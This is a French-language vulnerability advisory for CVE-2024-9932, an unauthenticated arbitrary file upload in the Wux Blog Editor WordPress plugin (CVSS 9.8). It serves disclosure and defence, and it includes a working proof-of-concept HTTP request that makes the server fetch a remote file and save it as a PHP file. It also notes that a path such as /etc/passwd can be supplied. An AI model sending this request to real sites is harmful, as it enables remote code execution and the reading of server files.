
Wux Blog Editor <= 3.0.0 - Téléchargement de fichier arbitraire non authentifié
Wux Blog Editor <= 3.0.0 - Téléchargement arbitraire de fichiers non authentifié
Le plugin Wux Blog Editor pour WordPress est vulnérable aux téléchargements arbitraires de fichiers en raison d'une validation insuffisante du type de fichier dans la fonction wuxbt_insertImageNew dans les versions jusqu'à 3.0.0 inclus. Cela permet à des attaquants non authentifiés de télécharger des fichiers arbitraires sur le serveur du site affecté, ce qui pourrait permettre l'exécution de code à distance possi
Link: CVE-2024-9932
State: PUBLISHED
Score: 9.8
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
POST /wp-json/external-post-editor/v2/image-upload HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/plugins.php?plugin_status=all&paged=1&s
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 165
Origin: http://kubernetes.docker.internal
Connection: keep-alive
{
"url": "https://rfi.nessus.org/rfi.txt",
"imageName": "rf.php",
"image_alt": "Description of the image",
"image_title": "Title of the image"
}
Le fichier se retrouve dans /wp-content/uploads/2024/11/rf.php
Vous pouvez également lui fournir un emplacement de fichier comme /etc/passwd